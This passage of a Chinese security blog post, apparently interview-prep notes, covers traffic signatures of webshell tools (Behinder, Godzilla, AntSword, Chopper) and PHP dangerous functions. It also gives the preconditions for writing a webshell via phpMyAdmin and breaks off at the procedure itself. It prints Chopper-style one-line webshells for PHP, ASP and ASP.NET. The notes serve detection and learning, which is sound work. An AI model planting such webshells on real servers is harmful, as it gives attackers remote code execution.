<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 5.4.2">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.lug.ustc.edu.cn/css2?family=Lato:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"liu1272.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"copycode":{"enable":true,"style":"flat"},"fold":{"enable":true,"height":300},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":50,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/config.min.js"></script>

    <meta name="description" content="Shell工具的流量特征冰蝎2.0  使用AES加密 + base64编码，AES使用动态密钥对通信进行加密，进行请求时内置了十几个User-Agent头，每次请求时会随机选择其中的一个。  因此当发现一个ip的请求头中的user-agent在频繁变换，就可能是冰蝎。  Content-Length: 16, 16就是冰蝎2连接的特征 冰蝎3.0  取消了2.0的动态获取密钥，使用固定的连接密钥">
<meta property="og:type" content="article">
<meta property="og:title" content="面试复习二">
<meta property="og:url" content="https://liu1272.github.io/2024/03/21/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%BA%8C/index.html">
<meta property="og:site_name" content="Robin">
<meta property="og:description" content="Shell工具的流量特征冰蝎2.0  使用AES加密 + base64编码，AES使用动态密钥对通信进行加密，进行请求时内置了十几个User-Agent头，每次请求时会随机选择其中的一个。  因此当发现一个ip的请求头中的user-agent在频繁变换，就可能是冰蝎。  Content-Length: 16, 16就是冰蝎2连接的特征 冰蝎3.0  取消了2.0的动态获取密钥，使用固定的连接密钥">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/6DIM4aQdVYeEKou.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/MCBFLsHGmeXWKc8.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/84HqZIDVRhPao3Y.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/nQ3XLxSCl95hNpb.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/7GCwVLDKzMjYHhS.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/4zeJSlKdGMHFs6C.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/Ki24ZBd6l3vqWme.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/HFnAkSOw4GYxCNu.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/CiRj4UdNqbkSmZD.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/Mzr2vTVBCyhqYLZ.png">
<meta property="og:image" content="https://s2.loli.net/2024/03/21/DnXqU8AJLlZBt4u.png">
<meta property="article:published_time" content="2024-03-21T08:24:00.000Z">
<meta property="article:modified_time" content="2024-03-23T09:39:48.000Z">
<meta property="article:author" content="Shunyu">
<meta property="article:tag" content="日报">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2024/03/21/6DIM4aQdVYeEKou.png">


<link rel="canonical" href="https://liu1272.github.io/2024/03/21/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%BA%8C/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://liu1272.github.io/2024/03/21/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%BA%8C/","path":"2024/03/21/面试复习二/","title":"面试复习二"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>面试复习二 | Robin</title>
  

  <script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/third-party/analytics/baidu-analytics.min.js"></script>
  <script async src="https://hm.baidu.com/hm.js?[object Object]"></script>

  <script async src="//assets.growingio.com/2.1/gio.js"></script>
  <script class="next-config" data-name="growingio_analytics" type="application/json">{"enable":false}</script>
  <script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/third-party/analytics/growingio.min.js"></script>

  <script defer src='https://static.cloudflareinsights.com/beacon.min.js' data-cf-beacon='{&quot;token&quot;: &quot;[object Object]&quot;}'></script>

  <script>
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "[object Object]");
</script>




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Robin" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Robin</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">LiuGuobin's blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">8</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">111</span></a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Shell%E5%B7%A5%E5%85%B7%E7%9A%84%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-number">1.</span> <span class="nav-text">Shell工具的流量特征</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E2-0"><span class="nav-number">1.0.1.</span> <span class="nav-text">冰蝎2.0</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E3-0"><span class="nav-number">1.0.2.</span> <span class="nav-text">冰蝎3.0</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E4-0"><span class="nav-number">1.0.3.</span> <span class="nav-text">冰蝎4.0</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%93%A5%E6%96%AF%E6%8B%89"><span class="nav-number">1.0.4.</span> <span class="nav-text">哥斯拉</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E7%89%B9%E5%BE%81"><span class="nav-number">1.0.4.1.</span> <span class="nav-text">静态特征</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E7%89%B9%E5%BE%81"><span class="nav-number">1.0.4.2.</span> <span class="nav-text">动态特征</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%9A%81%E5%89%91"><span class="nav-number">1.0.5.</span> <span class="nav-text">蚁剑</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E7%89%B9%E5%BE%81-1"><span class="nav-number">1.0.5.1.</span> <span class="nav-text">静态特征</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E7%89%B9%E5%BE%81-1"><span class="nav-number">1.0.5.2.</span> <span class="nav-text">动态特征</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8F%9C%E5%88%80"><span class="nav-number">1.0.6.</span> <span class="nav-text">菜刀</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E7%89%B9%E5%BE%81-2"><span class="nav-number">1.0.6.1.</span> <span class="nav-text">动态特征</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.</span> <span class="nav-text">常见的解析漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP%E5%B8%B8%E8%A7%81%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="nav-number">3.</span> <span class="nav-text">PHP常见危险函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#phpmyadmin%E6%8B%BFwebshell"><span class="nav-number">4.</span> <span class="nav-text">phpmyadmin拿webshell</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#select-into-outfile%E7%9B%B4%E6%8E%A5%E5%86%99%E5%85%A5"><span class="nav-number">4.0.1.</span> <span class="nav-text">select into outfile直接写入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6"><span class="nav-number">4.0.1.1.</span> <span class="nav-text">利用条件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="nav-number">4.0.1.2.</span> <span class="nav-text">利用过程</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%85%A8%E5%B1%80%E6%97%A5%E5%BF%97%E5%86%99shell"><span class="nav-number">4.0.2.</span> <span class="nav-text">利用全局日志写shell</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B-1"><span class="nav-number">4.0.2.1.</span> <span class="nav-text">利用过程</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#IDS-IPS%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF"><span class="nav-number">5.</span> <span class="nav-text">IDS&#x2F;IPS绕过思路</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#IPS%E9%98%BB%E6%96%AD%E5%9C%BA%E6%99%AF"><span class="nav-number">5.0.1.</span> <span class="nav-text">IPS阻断场景</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF"><span class="nav-number">5.0.2.</span> <span class="nav-text">绕过思路</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Redis-getshell"><span class="nav-number">6.</span> <span class="nav-text">Redis getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Linux"><span class="nav-number">6.0.1.</span> <span class="nav-text">Linux</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Windows"><span class="nav-number">6.0.2.</span> <span class="nav-text">Windows</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Log4j%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">7.</span> <span class="nav-text">Log4j漏洞原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BF"><span class="nav-number">8.</span> <span class="nav-text">数据库利用姿势</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD"><span class="nav-number">9.</span> <span class="nav-text">Windows远程文件下载</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#PowerShell"><span class="nav-number">9.0.1.</span> <span class="nav-text">PowerShell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Bitsadmin"><span class="nav-number">9.0.2.</span> <span class="nav-text">Bitsadmin</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Certutil"><span class="nav-number">9.0.3.</span> <span class="nav-text">Certutil</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#wget"><span class="nav-number">9.0.4.</span> <span class="nav-text">wget</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ipc-%E6%96%87%E4%BB%B6%E5%85%B1%E4%BA%AB"><span class="nav-number">9.0.5.</span> <span class="nav-text">ipc$文件共享</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#at%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="nav-number">9.0.6.</span> <span class="nav-text">at计划任务</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%89%8B%E5%B7%A5%E5%88%A4%E6%96%AD%E9%9D%B6%E6%A0%87%E7%AB%99%E7%82%B9%E6%98%AFWindows-Linux"><span class="nav-number">10.</span> <span class="nav-text">手工判断靶标站点是Windows&#x2F;Linux</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="nav-number">11.</span> <span class="nav-text">常见危险函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E8%84%86%E5%BC%B1%E6%9C%8D%E5%8A%A1%E7%AB%AF%E5%8F%A3"><span class="nav-number">12.</span> <span class="nav-text">常见脆弱服务端口</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%AD%A3%E5%8F%8D%E5%90%91shell"><span class="nav-number">13.</span> <span class="nav-text">正反向shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%AD%A3%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86"><span class="nav-number">14.</span> <span class="nav-text">正反向代理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%8E%E8%AE%B0"><span class="nav-number">15.</span> <span class="nav-text">后记</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Shunyu"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Shunyu</p>
  <div class="site-description" itemprop="description">Welcome</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">111</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/liu1272" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;liu1272" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1265257855@qq.com" title="E-Mail → mailto:1265257855@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://liu1272.github.io/2024/03/21/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%BA%8C/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Shunyu">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Robin">
      <meta itemprop="description" content="Welcome">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="面试复习二 | Robin">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          面试复习二
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-03-21 16:24:00" itemprop="dateCreated datePublished" datetime="2024-03-21T16:24:00+08:00">2024-03-21</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-03-23 17:39:48" itemprop="dateModified" datetime="2024-03-23T17:39:48+08:00">2024-03-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%97%A5%E6%8A%A5/" itemprop="url" rel="index"><span itemprop="name">日报</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span id="/2024/03/21/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%BA%8C/" class="post-meta-item leancloud_visitors" data-flag-title="面试复习二" title="阅读次数">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span class="leancloud-visitors-count"></span>
    </span>
  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>3.5k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>13 分钟</span>
    </span>
</div>


          # 置顶图标
          
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="Shell工具的流量特征"><a href="#Shell工具的流量特征" class="headerlink" title="Shell工具的流量特征"></a>Shell工具的流量特征</h2><h4 id="冰蝎2-0"><a href="#冰蝎2-0" class="headerlink" title="冰蝎2.0"></a>冰蝎2.0</h4><p>  使用<code>AES加密 + base64编码</code>，AES使用动态密钥对通信进行加密，进行请求时内置了十几个User-Agent头，每次请求时会随机选择其中的一个。<br>  因此当发现一个ip的请求头中的user-agent在频繁变换，就可能是冰蝎。<br>  Content-Length: 16, 16就是冰蝎2连接的特征<br><a href="https://smms.app/image/6DIM4aQdVYeEKou" target="_blank"><img src="https://s2.loli.net/2024/03/21/6DIM4aQdVYeEKou.png" ></a><br><a href="https://smms.app/image/MCBFLsHGmeXWKc8" target="_blank"><img src="https://s2.loli.net/2024/03/21/MCBFLsHGmeXWKc8.png" ></a></p>
<h4 id="冰蝎3-0"><a href="#冰蝎3-0" class="headerlink" title="冰蝎3.0"></a>冰蝎3.0</h4><p>  取消了2.0的动态获取密钥，使用固定的连接密钥<br>  在冰蝎中，任何请求，最终都会调用Utils.getData函数，对请求的参数加密。对于上传文件，命令执行来讲，加密的参数不定长。但是对于密钥交互，获取基本信息来讲，payload都为定长，且无随机padding。<br>  webshell连接密码的MD5的前16位，默认连接密码是”<strong>rebeyond</strong>“(即密钥是<code>md5(&#39;rebeyond&#39;)[0:16]=e45e329feb5d925b</code>)<br>  3.0连接jsp的webshell的请求数据包中的content-type字段常见为application/octet-stream</p>
<h4 id="冰蝎4-0"><a href="#冰蝎4-0" class="headerlink" title="冰蝎4.0"></a>冰蝎4.0</h4><p>  v4.0版本不再有连接密码的概念，自定义传输协议的算法就是连接密码。<br>  Accept字段（弱特征），通常是Accept: application/json, text/javascript, /; q=0.01 意思是浏览器可接受任何文件，但最倾向application/json 和 text/javascript。<br>  Content-Type字段（弱特征），通常是Content-type: Application/x-www-form-urlencoded<br>  连接使用本地端口在49700左右(就是比较大的端口)，每连接一次，每建立一次新的连接，端口就依次增加。<br>  使用长连接，避免了频繁的握手造成的资源开销。默认情况下，请求头和响应头里会带有 Connection：Keep-Alive<br>  固定的请求头和响应头，请求字节头：dFAXQV1LORcHRQtLRlwMAhwFTAg/M ，响应字节头：TxcWR1NNExZAD0ZaAWMIPAZjH1BFBFtHThcJSlUXWEd<br>  默认时，冰蝎 webshell都有“e45e329feb5d925b” 一串密钥，与冰蝎3.0相同。<br>  默认连接密码仍然是<code>rebeyond</code></p>
<h4 id="哥斯拉"><a href="#哥斯拉" class="headerlink" title="哥斯拉"></a>哥斯拉</h4><p>  采用了和冰蝎 2.0 类似的密钥交换方式。它的webshell需要动态生成，可以根据需求选择不同的加密方式。<br><a href="https://smms.app/image/84HqZIDVRhPao3Y" target="_blank"><img src="https://s2.loli.net/2024/03/21/84HqZIDVRhPao3Y.png" ></a></p>
<h5 id="静态特征"><a href="#静态特征" class="headerlink" title="静态特征"></a>静态特征</h5><p>  在默认脚本编码的情况下，jsp会出现xc、pass字符和Java反射(ClassLoader，getClass().getClassLoader())，base64加解码等特征。</p>
<h5 id="动态特征"><a href="#动态特征" class="headerlink" title="动态特征"></a>动态特征</h5><p>  Accept字段（弱特征），默认是<code>Accept:text/html, image/gif, image/jpeg, *; q=.2, /; q=.2</code><br>  Cookie中有一个非常关键的特征，最后会有个分号。估计后续的版本会修复。<br>  响应体的数据有一定特征，哥斯拉会把一个32位的md5字符串按照一半拆分，分别放在base64编码的数据的前后两部分。整个响应包的结构体征为：md5前十六位+base64+md5后十六位。<br>  请求包长度 52541<br>  以<code>pass=“xxxx”</code>开始请求包<br>  请求包较长，响应包为0<br>  一个tcp包里面有三个http<br>  一共6个http报文，3去3回</p>
<h4 id="蚁剑"><a href="#蚁剑" class="headerlink" title="蚁剑"></a>蚁剑</h4><h5 id="静态特征-1"><a href="#静态特征-1" class="headerlink" title="静态特征"></a>静态特征</h5><p>  蚁剑中php使用assert、eval执行；asp只有eval执行；在jsp使用的是Java类加载（ClassLoader），同时会带有base64编码解码等字符特征。</p>
<h5 id="动态特征-1"><a href="#动态特征-1" class="headerlink" title="动态特征"></a>动态特征</h5><p>  我们使用一句话木马上传webshell，抓包后会发现每个请求体都存在以<code>@ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0)</code>开头。<br>  并且响应体的返回结果是base64编码发混淆字符，格式为：随机数 结果 随机数。<br>  参数名大多以“_0x…..=”这种形式（下划线可替换为其他）所以，以_0x开头的参数名，后面为加密数据的数据包也可识别为蚁剑的流量特征。</p>
<h4 id="菜刀"><a href="#菜刀" class="headerlink" title="菜刀"></a>菜刀</h4><p>  菜刀使用一句话木马，特征十分明显，在PHP、ASP、ASP.NET的网站都可以：</p>
<pre><code>PHP:  &lt;?php @eval([$_post[&#39;test&#39;]]); ?&gt;
ASP:  &lt;% eval request(&quot;test&quot;)%&gt;
ASP.NET:  &lt;%@ Page Language=&quot;Javascript&quot;%&gt;&lt;% eval(Request.Item[&quot;test&quot;],&quot;unsafe&quot;);%&gt;
</code></pre>
<h5 id="动态特征-2"><a href="#动态特征-2" class="headerlink" title="动态特征"></a>动态特征</h5><p>  payload在请求体中，采用url编码+base64编码，<strong>payload部分是明文传输</strong>。<br>  payload中有eval或assert、base64_decode这样的字符。<br>  payload中有默认固定的&amp;z0=QGluaV9zZXQ…这样base64加密的攻击载荷<br>  参数<strong>z0</strong>对应<code>$_POST[z0]</code>接收到的数据，且固定为QGluaV9zZXQ开头。<br>  进行base64解码后可看到代码：<code>@ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0);@set_magic_quotes_runtime(0);</code>这段意思是首先关闭报错和magic_quotes，接下来去获取主机的信息。</p>
<h2 id="常见的解析漏洞"><a href="#常见的解析漏洞" class="headerlink" title="常见的解析漏洞"></a>常见的解析漏洞</h2><p><a href="https://smms.app/image/nQ3XLxSCl95hNpb" target="_blank"><img src="https://s2.loli.net/2024/03/21/nQ3XLxSCl95hNpb.png" ></a></p>
<h2 id="PHP常见危险函数"><a href="#PHP常见危险函数" class="headerlink" title="PHP常见危险函数"></a>PHP常见危险函数</h2><ol>
<li>eval()<br>  eval()函数就是将传入的字符串当作 PHP 代码来进行执行。</li>
<li>assert()<br>  如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。</li>
<li>call_user_func()<br>  第一个参数 callback 是被调用的回调函数，其余参数是回调函数的参数。</li>
</ol>
<h2 id="phpmyadmin拿webshell"><a href="#phpmyadmin拿webshell" class="headerlink" title="phpmyadmin拿webshell"></a>phpmyadmin拿webshell</h2><h4 id="select-into-outfile直接写入"><a href="#select-into-outfile直接写入" class="headerlink" title="select into outfile直接写入"></a>select into outfile直接写入</h4><h5 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h5><ol>
<li>对web目录需要有写权限能够使用单引号(root)</li>
<li>知道网站绝对路径(phpinfo/php探针/通过报错等)</li>
<li>secure_file_priv没有具体值<pre><code>show global variables like &#39;%secure%&#39;;
查看当前设置
  1.当 secure_file_priv 的值为 NULL ，表示限制 mysqld 不允许导入|导出，此时无法提权
  2. 当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权
  3. 当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权
  在MySQL的配置文件my.ini中进行配置
</code></pre>
</li>
</ol>
<h5 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h5><ol>
